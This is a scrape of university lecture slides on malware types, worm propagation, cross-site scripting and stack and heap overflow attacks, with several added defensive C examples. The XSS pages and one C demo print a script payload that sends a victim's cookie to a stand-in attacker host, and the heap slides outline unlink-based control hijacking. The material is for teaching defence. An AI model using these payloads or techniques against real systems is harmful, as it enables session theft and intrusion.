Date post: 24-Jul-2020
Page 1: Malware (dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf)

Malware

Page 2: Reading Material

• Ken Thompson and Trojans
  – http://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
• Worm Anatomy and Model
  – http://portal.acm.org/citation.cfm?id=948196
• Smashing the Stack for Fun and Profit
  – http://insecure.org/stf/smashstack.html

Page 3: Why Do We Care?

• SANS Top 20 Internet Security Vulnerabilities
  – http://www.sans.org/top20/
• Broad issues very similar year in and year out

Page 4: Zero Day Exploit

• An exploit that has no patch available
• Time between exploit discovery and wide activation is shrinking
• Malware developer has a trade-off in launch tactics
  – Big splash but faster discovery
  – Reduced attack rate but longer undiscovered

Page 5: Windows Meta File Exploit

• Flaws in the Windows rendering engine enable remote code execution
  – Memory corruptions
  – Visiting a web site with a "bad image" causes the attack
  – Attack sold for $4,000
  – http://www.eweek.com/article2/0,1895,1918198,00.asp
• Bugtraq post in December 2005
  – Probably lingering earlier
  – 0 day exploit
• Microsoft's response in early January 2006
  – http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx

Page 6: Malicious Code

• Set of instructions that cause a site's security policy to be violated
• Often leveraging an inadvertent flaw (design or implementation)
  – To propagate/install on target
  – To cause harm on target

Page 7: Malware Summary

Code type      Characteristics
Virus          Attaches itself to a program and copies itself to other programs
Trojan Horse   Contains unexpected, additional functionality
Logic Bomb     Triggers action when a condition occurs
Time Bomb      Triggers action when a specified time occurs
Trapdoor       Allows unauthorized access to functionality
Worm           Propagates copies of itself through a network
Rabbit         Replicates itself without limit to exhaust resources
Netbot         Trapdoor programs orchestrated through a control channel (IRC)
Root Kit       Hooks standard OS calls to hide data

Page 8: Trojan Horses

• Seemingly useful program that contains code that does harmful things
  – Performs both overt and covert actions
• Frequently embedded in applets or games, email attachments
• Trojan horse logins, spoofed authentication or webpage forms

Page 9: Thompson's Trojan Compiler

• Detect that it is compiling the "login" program
  – Add a "bug" to accept a fixed password
• Problem:
  – Easily seen in code review
• Solution:
  – Add a second bug, activated when compiling the compiler itself
  – Then remove the bugs from the source

Page 10: Key Loggers and Spyware

• Gather information from the computer
  – Send it back to the central office
• From key loggers can gather
  – Passwords
  – Confidential communication
  – Keep track of your kids/employees
• From spyware can gather
  – Web browsing habits
  – Marketing information

Page 11: Rootkits

• Insert file filters to make files or directories disappear from normal listings
  – Can replace Windows API pointers (user mode)
  – Can also replace syscall table pointers
• Both require privilege, but most Windows installs require privilege anyway
  – The power of extensibility used for the dark side
• Techniques apply equally well to Linux and Mac

Page 12: Sony Player DRM and Rootkits

• Bad press for Sony, 2005
  – Mark Russinovich's original observations: http://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments
  – A timeline
    • http://www.boingboing.net/2005/11/14/sony_anticustomer_te.html
• To ensure that copy protection is not evaded, install a rootkit to hide the protection code
  – Available for other attackers to use
  – Uninstallable
  – Uses CPU and memory
  – Not adequately noted in EULA

Page 13: Virus Operation

• Virus Phases:
  – Dormant: Waiting on trigger event
  – Propagation: Replicating to programs/disks
  – Triggering: By event, to execute payload
  – Execution: Executing payload
• Details usually machine/OS specific
  – Exploits different features or weaknesses

Page 14: Virus Pseudocode

beginvirus:
  if spread-condition then begin
    for some set of target files do begin
      if target is not infected then begin
        determine where to place virus instructions
        copy instructions from beginvirus to endvirus into target
        alter target to execute new instructions
      end
    end
  end
  perform some actions
  goto beginning of infected program
endvirus:

Page 15: Virus Attachment

• A virus can attach itself to a program or to data by
  – Appending itself to the beginning or end of either source code or assembly, so it is activated when the program is run
  – Integrating itself into the program, with its code spread out
  – Integrating into data: executable text, macros, scripting
  – Macros and email attachments
• An activated virus may:
  – Cause direct or immediate harm
  – Run as a memory resident program (TSR, daemon, or service)
  – Replace or relocate boot sector programs, to start at system start-up

Page 16: Macro Viruses

• Macro code attached to some data file
  – Interpreted rather than compiled
  – Platform independent
• Interpreted by the program using the file
  – E.g., Word/Excel macros
  – Esp. using auto command and command macros
  – Often automatically invoked
• Blurs the distinction between data and program files, making the task of detection much harder
• Classic trade-off: "ease of use" vs "security"

Page 17: Email Viruses

• Spread using email with an attachment containing a macro virus
  – Melissa, LoveBug
• Triggered when the user opens or executes the attachment
  – Also when mail is viewed, by using scripting features in the mail agent
  – Usually targeted at the Microsoft Outlook mail agent and Word/Excel documents, Microsoft IIS

Page 18: Basic Precautions

• Don't import untrusted programs
  – Who can you trust?
  – Viruses have been found in commercial shrink-wrap software
  – Standard download sites have been corrupted
    • Check MD5 hashes
• Scan for viruses, install anti-virus software
• Update anti-virus software regularly

Page 19: Signature Scanning

• Early viruses had characteristic code patterns known as signatures
• Create a database of patterns, search files for the patterns (McAfee)
• Use data-mining, learning, feature extraction etc. to look for disguised or obfuscated patterns
• Can only scan for known signatures

Page 20: Signature Avoiding Viruses

• Polymorphic virus produces varying but operational copies of itself
  – Uses alternative but equivalent instructions
  – Gets around signature scanners. Whale virus, 32 variants
• Stealth virus actively tries to hide all signs of its presence
  – A virus can intercept calls to read a file and return correct values about file sizes etc.

Page 21: Another Signature Avoiding Virus

• Encrypted virus stores the bulk of itself encrypted
  – Small decrypt routine in clear
  – Key stored in clear
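An added example (not from the slides) of the scanner pages 19 to 21 describe: a byte-signature database searched over file contents, run against a constructed toy "virus" stored first in clear and then XOR-encrypted with a key, as on page 21. The body bytes, stub bytes, signature names and key are all constructed for illustration; the point is that once the bulk is encrypted, only the small decrypt routine kept in clear remains a stable pattern for the database.

```c
#include <stddef.h>
#include <string.h>

struct signature {
    const char          *name;
    const unsigned char *pattern;
    size_t               len;
};

/* Constructed stand-ins, not real malware: an arbitrary "virus body" and
 * the small decrypt stub that an encrypted virus keeps in the clear. */
static const unsigned char BODY[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0x42, 0x42, 0x42 };
static const unsigned char STUB[] = { 0x31, 0xC9, 0x8A, 0x04, 0x0E };

/* The scanner's database of known patterns (constructed). */
static const struct signature SIGS[] = {
    { "toy-virus-body",         BODY, sizeof BODY },
    { "toy-virus-decrypt-stub", STUB, sizeof STUB },
};
#define NSIGS (sizeof SIGS / sizeof SIGS[0])

/* Does pat (length m) occur anywhere in data (length n)? */
static int contains(const unsigned char *data, size_t n,
                    const unsigned char *pat, size_t m)
{
    size_t i;
    if (m == 0 || n < m) return 0;
    for (i = 0; i + m <= n; i++)
        if (memcmp(data + i, pat, m) == 0) return 1;
    return 0;
}

/* Signature scan: name of the first matching pattern, or NULL if clean. */
const char *scan(const unsigned char *data, size_t n)
{
    size_t i;
    for (i = 0; i < NSIGS; i++)
        if (contains(data, n, SIGS[i].pattern, SIGS[i].len))
            return SIGS[i].name;
    return NULL;
}

/* Append src to out, XORing each byte with key (key 0 = stored in clear). */
static size_t append(unsigned char *out, size_t pos, size_t cap,
                     const unsigned char *src, size_t n, unsigned char key)
{
    size_t i;
    for (i = 0; i < n && pos < cap; i++)
        out[pos++] = (unsigned char)(src[i] ^ key);
    return pos;
}

/* Lay out a constructed "file": benign text, optionally the clear-text
 * decrypt stub, then the body stored with the given key. Returns its length. */
size_t build_file(unsigned char *out, size_t cap, int with_stub, unsigned char key)
{
    static const unsigned char prefix[] = "benign program text ";
    size_t pos = append(out, 0, cap, prefix, sizeof prefix - 1, 0);
    if (with_stub)
        pos = append(out, pos, cap, STUB, sizeof STUB, 0);
    return append(out, pos, cap, BODY, sizeof BODY, key);
}

/* Body stored in clear: the body signature matches. */
const char *scan_plain_virus(void)
{
    unsigned char f[64];
    size_t n = build_file(f, sizeof f, 0, 0x00);
    return scan(f, n);
}

/* Body encrypted and nothing else: the body pattern is no longer present. */
const char *scan_encrypted_body_only(void)
{
    unsigned char f[64];
    size_t n = build_file(f, sizeof f, 0, 0x5A);
    return scan(f, n);
}

/* Body encrypted but the decrypt routine is in clear: the stub signature
 * is the one the database must carry. */
const char *scan_encrypted_with_stub(void)
{
    unsigned char f[64];
    size_t n = build_file(f, sizeof f, 1, 0x5A);
    return scan(f, n);
}
```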

Page 22: Worms

• Propagate from one computer to another
• Viruses use email/infected media to propagate, so the differentiation is fuzzy

Page 23: The Morris Worm Incident

• How 99 lines of code brought down the Internet (ARPANET actually) in November 1988.
• Robert Morris Jr., Ph.D. student, Cornell, wrote a program that could:
  – Connect to another computer, and find and use one of several vulnerabilities (buffer overflow in fingerd, password cracking etc.) to copy itself to that second computer.
  – Begin to run the copy of itself at the new location.
  – Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET (mistake!)
• Morris was sentenced to three years of probation, 400 hours of community service, and a fine of $10,050. He is now a Professor at MIT.
• Worms have gotten bigger and more aggressive

Page 24: Worm Phases

• Dormant
• Propagation
  – Search for other systems to infect
  – Establish connection to target remote system
  – Replicate self onto remote system
• Triggering
• Execution

Page 25: Who to target?

• Scanning
  – Currently generally used
  – Select random addresses
    • Mix of addresses in the current network (local computers probably have similar vulnerabilities) and remote networks
  – No longer feasible in IPv6
    • 32 bit vs 128 bit address space

Page 26: Viruses and Worms in IPv4

• Slammer infected most of the IPv4 Internet in 10 minutes (75,000 hosts infected in one-half hour)

Figure source: caida.org

Page 27: Worms in IPv6

• Address space is 2^128 instead of 2^32
  – Random address selection will not work
• Say ¼ of the addresses in an IPv4 network run Windows
  – 1 in 4 chance of finding a target with each probe
• Spread that among 2^128 addresses
  – 1 in 2^98 chance of finding a viable target

Page 28: Other Techniques to Find Targets

• Interesting Papers
  – How to 0wn the Internet… http://www.icir.org/vern/papers/cdc-usenix-sec02/
  – Top speed of flash worms http://vividmachines.com/papers/topspeed.pdf
• Hitlist Scanning
  – Stealthy scans (randomized, over months), distributed scanning, DNS searches, spiders (Code Red, crawls for high connectivity), listening on P2P networks, public lists
• Permutation scanning (divide up IP address space)
• Warhol worm: hit list + permutation

Page 29: Network Propagation

• Send a small number of packets to reduce detection
• UDP packets
  – No ACK needed, so can spoof source address
• Connect to vulnerable network services
  – Generally exercise buffer overflow
  – Launch shell
    • Running at high privilege (ideal)
    • Or use as foothold to mount other attacks to gain privilege
    • Or use as attack launch point

Page 30: Worm Examples

• Morris Worm
• Code Red
  – Exploited bug in MS IIS to penetrate and spread
  – Probes random IPs for systems running IIS
  – Had trigger time for denial-of-service attack
  – 2nd wave infected 360000 servers in 14 hours
• Code Red 2: trapdoor, for remote control
• Nimda: used multiple infection mechanisms, email, file-sharing, web-client, IIS, Code Red 2 backdoor

Page 31: Attacks through browsers

Page 32: HTML is stateless

• Each interaction of a client with a server has no memory, at least as far as the protocol is concerned
• Session state is created by the server, writing a "cookie" into a document as part of the header, saved by the client's browser
• May contain anything the server wishes to record, e.g.
  – Password, account number, identity, shopping cart
  – Most typically a session ID
• Cookie is returned by the browser with every access to the server

Page 33: How cookies work

From the client to the server, something like

With a response (to set a cookie) like

Browser understands to include the cookie with every subsequent GET, e.g.

Cookie tells the server the second request is related to the first
Other cookie attributes include domain, path, expiration date

Page 34: Abuse of Cookies

• "Cookie hijacking"
  – Unencrypted cookie value sniffed off the network, HTTP session is "hijacked" by an outsider who has the credentials the cookie represents
• "Cookie Theft", more subtle, done remotely
  – Track behaviors
  – Reveal identity
  – Steal and abuse identity
• Access to cookies achieved using Javascript
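As an added example (not the slides' own material), a Set-Cookie header audit in C covering the attributes on page 33 and the two abuses on this page. It assumes the standard Secure and HttpOnly cookie attributes (RFC 6265): Secure keeps the cookie off unencrypted connections, where hijacking by sniffing happens, and HttpOnly hides it from document.cookie, the Javascript route to theft. The header strings in the comments and test are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

struct cookie_audit {
    char name[64];     /* cookie name, e.g. SESSIONID */
    char domain[128];  /* Domain attribute, if present */
    char path[128];    /* Path attribute, if present */
    int  secure;       /* Secure: browser sends the cookie only over TLS */
    int  httponly;     /* HttpOnly: browser hides it from document.cookie */
};

/* Copy n bytes of src into dst (cap bytes), dropping trailing spaces. */
static void copy_bounded(char *dst, size_t cap, const char *src, size_t n)
{
    while (n > 0 && src[n - 1] == ' ') n--;
    if (n >= cap) n = cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Whole-token, case-insensitive match (attribute names are case-insensitive). */
static int attr_is(const char *tok, const char *name)
{
    while (*tok && *name &&
           tolower((unsigned char)*tok) == tolower((unsigned char)*name)) {
        tok++; name++;
    }
    return *tok == '\0' && *name == '\0';
}

/* Parse one Set-Cookie header value ("name=value; attr; attr=value; ...").
 * Returns 0 on success, -1 if no cookie name was found. */
int audit_set_cookie(const char *hdr, struct cookie_audit *a)
{
    const char *p = hdr;
    int first = 1;
    memset(a, 0, sizeof *a);
    while (*p) {
        const char *end, *eq;
        size_t seglen, klen;
        char key[64];
        while (*p == ' ') p++;
        end    = strchr(p, ';');
        seglen = end ? (size_t)(end - p) : strlen(p);
        eq     = memchr(p, '=', seglen);
        klen   = eq ? (size_t)(eq - p) : seglen;
        copy_bounded(key, sizeof key, p, klen);
        if (seglen == 0) {
            /* empty segment, e.g. a trailing ";" */
        } else if (first) {
            copy_bounded(a->name, sizeof a->name, key, strlen(key));
            first = 0;
        } else if (attr_is(key, "Secure")) {
            a->secure = 1;
        } else if (attr_is(key, "HttpOnly")) {
            a->httponly = 1;
        } else if (eq && attr_is(key, "Domain")) {
            copy_bounded(a->domain, sizeof a->domain, eq + 1, seglen - klen - 1);
        } else if (eq && attr_is(key, "Path")) {
            copy_bounded(a->path, sizeof a->path, eq + 1, seglen - klen - 1);
        }
        if (!end) break;
        p = end + 1;
    }
    return first ? -1 : 0;
}

/* Missing protections for a credential-bearing cookie such as a session ID:
 * bit 1 = no Secure, bit 2 = no HttpOnly; -1 if the header was unparseable. */
int cookie_missing_flags(const char *hdr)
{
    struct cookie_audit a;
    if (audit_set_cookie(hdr, &a) != 0) return -1;
    return (a.secure ? 0 : 1) | (a.httponly ? 0 : 2);
}

/* Constructed sample: "SESSIONID=abc123; Path=/; Secure; HttpOnly" -> 1 */
int cookie_is_hardened(const char *hdr)
{
    return cookie_missing_flags(hdr) == 0;
}

/* Is the cookie scoped to exactly this Domain attribute value? */
int cookie_domain_is(const char *hdr, const char *domain)
{
    struct cookie_audit a;
    if (audit_set_cookie(hdr, &a) != 0) return 0;
    return strcmp(a.domain, domain) == 0;
}
```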

Page 35: Javascript

• Programming language designed to make web pages "dynamic", e.g.,
  – Format checking of web form entries
  – Pop open a new window
  – Changing images as the cursor passes over specific regions of the page
• Executed within a browser ("client-side")
  – Can be embedded in a page obtained from the server
  – Interacts with elements of the page ("Document Object Model", or DOM)
    • Includes data; javascript can get the value of a cookie

Page 36: Document Object Model

• A script bound to a page has a "DOM" model of that page
• Can pass information back to the server, or to a different web-site altogether
• So we have a powerful programming language in a web page that can get to sensitive information and send it elsewhere
  – Think maybe there's potential for a problem here?

Page 37: Protection 101

A browser concurrently manages multiple pages from multiple origins
  – Each has its own document elements, including cookies
The "Same Origin Policy" prevents a document or script from one site of origin from manipulating or communicating with one from a different origin
  – But allows coordination for pages "within" the same origin, e.g., scripts can "see" other pages, including their cookies
"Origin" here refers to the (domain name, port, protocol) of the site, see below

Page 38: The security assumption

Under the Same Origin Policy, the client browser trusts any script it receives from the server to access any cookie bound to any page in the same domain, because it trusts the server

Should it?

Frequently a server will just reflect back input from a client

Page 39: Example of Reflecting Input

Query

Response

Page 40: The client might send a script!

A cross site scripting (XSS) vulnerability exists at a server if it reflects back a script that is then executed at the client

But what's the problem? A client attacks herself?

Watch this….

Page 41: XSS Attack

• Suppose
  – www.bob.com has an XSS vulnerability
  – Alice visits www.bob.com a lot
    • She logs in, www.bob.com returns a session ID cookie
  – Eve knows about the vulnerability and sends Alice an email with an evil link (containing an attack script)
    • Or embedded in a CSS header with HTML formatted email. Alice only has to OPEN the message!

Diagram labels: www.bob.com, login, cookie: session ID. The evil link:
http://host/a.php?variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?'%20+document.cookie</script>

Page 42: XSS Attack: Cookie Theft

Callouts on the URL: directed at server (www.bob.com), embedded script, transmission to www.witch.com, Alice's cookie (document.cookie)

Diagram labels: www.bob.com, cookie: session ID
http://www.bob.com/a.php?variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?'%20+document.cookie</script>

Page 43: XSS Attack: Cookie Theft

• Click evil URL
• …<script>… reflected back
• Script takes the permissions of Alice's page on www.bob.com
• Script executes
• With Alice's session ID, Eve can impersonate Alice, obtain sensitive information from her account on www.bob.com

Diagram labels: www.bob.com, www.witch.com, cookie: session ID
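An added example (not from the slides) of the reflection on pages 39 to 43, in C: a.php's reply is built once as the vulnerable server does it (raw interpolation of the query value into the page) and once with HTML escaping of the reflected value; the query value is the slides' own evil link, and each response is then checked for a live script tag. The page template, buffer sizes and function names are assumptions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The query value from the slides' evil link, i.e. what follows "variable=". */
static const char EVIL_VARIABLE[] =
    "\"><script>document.location="
    "'http://www.witch.com/cgi-bin/get.cgi?'+document.cookie</script>";

/* Replace the five characters that can change HTML structure with entities.
 * Returns the escaped length, or (size_t)-1 if dst (cap bytes) is too small. */
size_t html_escape(char *dst, size_t cap, const char *src)
{
    size_t n = 0;
    for (; *src; src++) {
        const char *rep = NULL;
        size_t len;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        len = rep ? strlen(rep) : 1;
        if (n + len >= cap) return (size_t)-1;   /* keep room for the null */
        if (rep) memcpy(dst + n, rep, len); else dst[n] = *src;
        n += len;
    }
    dst[n] = '\0';
    return n;
}

/* Build a.php's reply, reflecting the query value into an attribute value.
 * escape == 0 reproduces the vulnerable server; escape == 1 the fixed one.
 * Returns 0 on success, -1 if the page did not fit. */
int render_reflected(char *out, size_t cap, const char *variable, int escape)
{
    char safe[512];
    const char *v = variable;
    int n;
    if (escape) {
        if (html_escape(safe, sizeof safe, variable) == (size_t)-1) return -1;
        v = safe;
    }
    n = snprintf(out, cap,
                 "<html><body><form><input name=\"variable\" value=\"%s\">"
                 "</form></body></html>", v);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Crude response check a tester might apply: did a live script tag appear
 * where only an attribute value should be? */
int response_contains_script(const char *resp)
{
    return strstr(resp, "<script") != NULL;
}

/* Vulnerable server: the leading quote closes the attribute, the script is live. */
int vulnerable_reflects_script(void)
{
    char page[1024];
    if (render_reflected(page, sizeof page, EVIL_VARIABLE, 0) != 0) return -1;
    return response_contains_script(page);
}

/* Fixed server: the value stays inside the attribute as inert text. */
int hardened_reflects_script(void)
{
    char page[1024];
    if (render_reflected(page, sizeof page, EVIL_VARIABLE, 1) != 0) return -1;
    return response_contains_script(page);
}

/* In the fixed reply the attack string is visible only as entities. */
int hardened_output_is_entity_encoded(void)
{
    char page[1024];
    if (render_reflected(page, sizeof page, EVIL_VARIABLE, 1) != 0) return -1;
    return strstr(page, "value=\"&quot;&gt;&lt;script&gt;") != NULL;
}
```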

Page 44: Other XSS attacks

Bulletin Board Postings
  – some permit user inclusion of HTML
Mashups
  – Web sites that integrate interacting components from multiple sources, e.g., a hotel listing with maps.google.com at the side, or advertisements in Facebook
Mashups work around the Same Origin Policy
If a Mashup framework is vulnerable to XSS, then a malicious component can inject code
  – e.g. a paid-for web advertisement

Page 45: Mashups

If a Mashup framework is vulnerable to XSS, then a malicious component can inject code (e.g. an advertisement)

Page 46: Attacks through memory

Page 47: Outline

A typical attack through memory is comprised of several parts
  – Find an application with a memory vulnerability
    • Browsers, internet service apps, Adobe Reader…
  – Find a way of doing a controlled overwrite of a critical piece of memory
    • Usually to get the computer to execute the attacker's code
  – Find a way of getting the attacker's code into memory
  – Trigger the vulnerability with carefully crafted attack input

Page 48: Let's start at the very beginning

"Von Neumann" computers store programs in memory, along with data

Modern computers use dedicated registers to "point" at key locations

Diagram labels: Program Counter (PC), Stack Pointer (SP)

An "instruction" is read out from the memory location given by the PC, and interpreted by the control unit
  • the PC is increased to point to the next instruction
  • the "stack" is dynamically changing scratch space

Page 49: Memory Organization

Virtual memory: hardware translation of the logical address space to the physical one; every process "sees" the whole memory for itself

Memory partitioned into different segments with different roles
  • Kernel
  • Text (instructions)
  • Initialized data
  • Uninitialized data
  • Dynamically allocated
  • Stack
  • Heap

Page 50: Jumping around

The PC advances linearly, except when it is explicitly loaded
  – To branch on a conditional instruction
  – To "jump" to a subroutine
  – To "return" from a subroutine
  – To handle an exception
  – To select the implementation of a "virtual function"

In all but the first of these cases, the value loaded into the PC is found explicitly in memory.
  – A memory attack consists of changing that value to point to some code the attacker managed to get into the memory

51  

Page 51: Primer on subroutines

A subroutine is a modular block of code
  – The program "calls" it via a special CPU instruction
    • PC is loaded with the subroutine address
  – The subroutine "returns" to the instruction after the calling point, via a special CPU instruction
    • The address loaded into the CPU is on the "stack"

Page 52: Stack Dynamics

• Each subroutine call pushes a frame onto the stack
  – It is popped on return
  – SP moves with each stack operation
  – Look at the position of "Local Variables"
  – Memory writes go from low address to high address
  – Hold that thought….

Page 53: Buffer Overflow

When a buffer is created in memory, its maximum length is declared

Common operation: copy a string of characters from one place in memory to another
  – By convention, a null byte (all 0's) signals the end

Sloppy coding practice: copy one byte at a time, until null is reached

Diagram: memory cells "a b c null x y z empty empty"; labels: buffer, In use, from, to

Pages 54-58: Buffer Overflow (the same slide, animated)

The copy loop steps through the diagram one byte at a time: "from points to null? No", so a is copied, then b, then c. The buffer holds only two cells, so the copy continues past its end into the cells marked "In use": on page 58 the x has been overwritten (marked "!") by c.

Page 59: Malware’dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf · Malware’Summary’ Code type Characteristics Virus Attaches itself to program and copies to other

Buffer Overflow

•  Most common pen-test security vulnerability in 2003 (SANS/FBI)
•  One of the most serious classes of security threats
   –  An attacker can gain partial or complete control of a host
•  Buffer (array or string): space in which data can be held
•  A buffer's capacity is finite:
   –  char sample[10];
   –  sample[10] = 'A';   ← out-of-bounds error (the valid indices are 0 through 9)
•  Buffer sizes do not have to be predefined

Effects of Buffer Overflow

•  A program that fails to check for a buffer overflow may allow vital code or data to be overwritten
•  A buffer may overflow into and change:
   –  User's own data structures
   –  User's program code
   –  System data structures
   –  System program code
•  Most common attack is to subvert the function of a privileged program and take control of the host

Old School: Stack Smashing

•  Attacker overflows a stack-allocated variable to corrupt the return address
•  Also called a Stack Smashing Attack
   –  Formerly the most common buffer-overflow attack, now largely mitigated
•  Rewrite the return address or frame pointer with attack code, or rewrite a pointer to the address of "attack" code in user memory
•  On return, code in the stack buffer executes at the original program's privilege
   –  Typically attackers exec a shell

Stack smashing

Sometimes a subroutine will create a buffer in "local variables", copy a string into it, but not check length

[Figure, built up over several slides: a stack frame containing the local "Buffer"; "Attacker data" fills the buffer and continues past its end until it reaches the saved return address, which is replaced by the "Address of 'shellcode'"; the "shellcode" itself is elsewhere in the same copied string]

Returning from the subroutine call loads the PC with the address of "shellcode" (about which more, anon)

Attack code is just part of the string being copied

Defense against stack smashing

The attacker needs to know the memory address of his shellcode
–  The attacker's string gets loaded on to the stack; the attacker can use a debugger to figure out addresses

Defenses include
•  Setting "no execute" protection on the stack
•  Randomization of memory layout with each program execution
•  Static and dynamic buffer bounds checking

The Empire Strikes Back

Attacker attention moved to attacks through memory addresses not on the stack

Stack allocations are temporary: they disappear after a subroutine returns

The "heap" allows a program to dynamically request a block of memory and have it stay allocated across multiple subroutine calls

The data segments store variables and strings that might also be subverted by an overflow

Example: changing a file name

•  Imagine a buffer that resides just below a string that identifies a file
•  Further imagine a program that has a buffer overflow vulnerability on "buffer", opens the named file, and writes user-supplied information there
•  Attack consists of
   –  Overwriting buffer, replacing the file name with the attacker's choice, e.g., /etc/.rhosts
   –  Choosing the string to write into the file, e.g., an rhosts file that includes the attacker's machine
•  Observe that no subversion of control flow occurs

[Figure: "buffer" sits directly below the null-terminated file-name string "/tmp/scratch" in memory]

Attacks through the heap: preliminaries

Remember doubly linked lists

[Figure: three free blocks, each with a header holding "size", "next" and "prev"]

   block at     size   "next"      "prev"
   0xbcd3000    100    0xbcd3080   null
   0xbcd3080     32    0xbcd4000   0xbcd3000
   0xbcd4000     80    null        0xbcd3080

Programs dynamically add and delete items

Attacks through the heap: preliminaries

To remove the center block from the list, change pointers

[Figure, stepped through over several slides: the same three blocks; the variable "hdr" holds 0xbcd3000, the address of the first block, so hdr->next is the center block at 0xbcd3080 and hdr->next->next is the last block at 0xbcd4000]

Unlinking the center block is two pointer writes:

   hdr->next->next->prev = hdr->next->prev     (the last block's "prev" becomes 0xbcd3000)
   hdr->next             = hdr->next->next     (the first block's "next" becomes 0xbcd4000)

OBSERVE: the center header supplies both the target address (its "next", through which "prev" is written) AND the value to load (its "prev")
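The unlink above is the point where a corrupted header turns into a write of an attacker-chosen value to an attacker-chosen address, so modern allocators refuse to unlink a block whose neighbours do not point back at it (glibc aborts with "corrupted double-linked list"). The C below is an added example, not code from the lecture or from any allocator: it builds the figure's three-block list with the slide's field names, performs the slide's two-statement unlink, and places beside it a checked unlink that declines when the header has been tampered with. The blocks are ordinary stack objects here rather than the 0xbcd... addresses of the figure, and the `target`/`marker` objects stand in for the slide's "Jump adrs" and "Shellcode adrs".

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Free-block header as drawn on the slides: a size and two list links. */
struct hdr {
    size_t size;
    struct hdr *next;
    struct hdr *prev;
};

/* Link three blocks into the figure's list: first <-> middle <-> last. */
static void build_list(struct hdr *first, struct hdr *middle, struct hdr *last) {
    first->size = 100;  first->prev = NULL;    first->next = middle;
    middle->size = 32;  middle->prev = first;  middle->next = last;
    last->size = 80;    last->prev = middle;   last->next = NULL;
}

/* The slide's unlink, with hdr pointing at the block before the one being
 * removed. Nothing is validated: both the address written to and the value
 * written come straight out of the middle header. */
static void unlink_unchecked(struct hdr *hdr) {
    if (hdr->next->next != NULL) {
        hdr->next->next->prev = hdr->next->prev;
    }
    hdr->next = hdr->next->next;
}

/* Checked unlink: before writing anything, confirm that the middle block's
 * neighbours really point back at it. A header whose next/prev were
 * overwritten by an overflow fails the test and no write happens. */
static bool unlink_checked(struct hdr *hdr) {
    struct hdr *victim = hdr->next;
    if (victim == NULL || victim->prev != hdr) {
        return false;                             /* "prev" does not point back */
    }
    if (victim->next != NULL && victim->next->prev != victim) {
        return false;                             /* "next" does not point back */
    }
    if (victim->next != NULL) {
        victim->next->prev = hdr;
    }
    hdr->next = victim->next;
    return true;
}

/* Healthy list: either unlink removes the middle block the same way. */
bool healthy_unlink_works(bool use_checked) {
    struct hdr first, middle, last;
    build_list(&first, &middle, &last);
    if (use_checked) {
        if (!unlink_checked(&first)) return false;
    } else {
        unlink_unchecked(&first);
    }
    return first.next == &last && last.prev == &first;
}

static struct hdr marker;   /* stands in for the value an attacker wants stored */

/* Corrupt the middle header the way the slides describe: "next" now points at
 * an unrelated object and "prev" at the marker. */
static void corrupt_middle(struct hdr *middle, struct hdr *target) {
    middle->next = target;    /* "Jump adrs" */
    middle->prev = &marker;   /* "Shellcode adrs" */
}

/* The unchecked unlink plants the marker's address inside the unrelated object. */
bool corrupted_header_fools_unchecked(void) {
    struct hdr first, middle, last, target = {0, NULL, NULL};
    build_list(&first, &middle, &last);
    corrupt_middle(&middle, &target);
    unlink_unchecked(&first);
    return target.prev == &marker;
}

/* The checked unlink refuses, and the unrelated object is untouched. */
bool corrupted_header_is_rejected(void) {
    struct hdr first, middle, last, target = {0, NULL, NULL};
    build_list(&first, &middle, &last);
    corrupt_middle(&middle, &target);
    bool refused = !unlink_checked(&first);
    return refused && target.prev == NULL;
}

int main(void) {
    printf("healthy unlink (unchecked/checked): %d/%d\n",
           healthy_unlink_works(false), healthy_unlink_works(true));
    printf("corrupted header fools unchecked: %d, rejected by checked: %d\n",
           corrupted_header_fools_unchecked(), corrupted_header_is_rejected());
    return 0;
}
```

The check costs two pointer compares per unlink and is exactly why the slide's later "BUSTED" verdict on this trick holds for current allocators: the forged "next" can only pass if the memory it points at already contains a pointer back to the victim.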

Attacks through the heap: the real deal

Suppose an attacker can corrupt the middle header

[Figure, over two slides: the three blocks again, with the middle header (0xbcd3080, size 32) overwritten. Its "next" now holds "Jump adrs", the address of a function pointer (or a subroutine return address) inside a "User Data Object"; its "prev" now holds "Shellcode adrs"]

The unlinking overwrites the return address: hdr->next->next->prev = hdr->next->prev now stores the shellcode address at "Jump adrs". On the call to the function, control is passed to the shellcode.

How can headers become corrupted?

•  Attack has to know how the heap is managed
•  Attack code uses allocations/deallocations to get
   –  A pointer to an object that points to the target
   –  A pointer to an object immediately "below" the target in memory that can be overflowed

[Figure, built up over several slides: a block header ("hdr": size 32, "next", "prev") sits just above an object the attacker can overflow; the overflow runs out of that object into the header, replacing "next" with "Jump adrs" and "prev" with "Shellcode adrs"]

Heap-based attacks

•  Intimate knowledge of how the heap is managed required
•  Application code with a suitable overflow vulnerability required
•  Ability to allocate / deallocate heap blocks to position for the attack required
•  Ability to load shellcode required
•  Ability to aim the jump at the shellcode required

Seems very tricky, but...

•  Knowledge of the heap: the attacker can observe it using a debugger, and this information is shared in the cyber underground
•  Overflow vulnerability: "fuzzing" an application with lots of random junk leads to a crash; post-mortem analysis finds where heap pointers were corrupted due to overflow... the attacker has found his toehold
   –  Fuzzing with not-so-random junk, e.g. looking for integer/floating point overflows
      •  Mismatch between allocated space (too small) and data being loaded there
•  Positioning blocks: web browsers running javascript or flash take scripts offered on webpages and run them; pdf documents carry scripts in their headers, and readers run them immediately
•  Loading shellcode: shellcode is encoded in strings written into dynamically allocated memory
   –  May be passed as part of attack input through a web connection
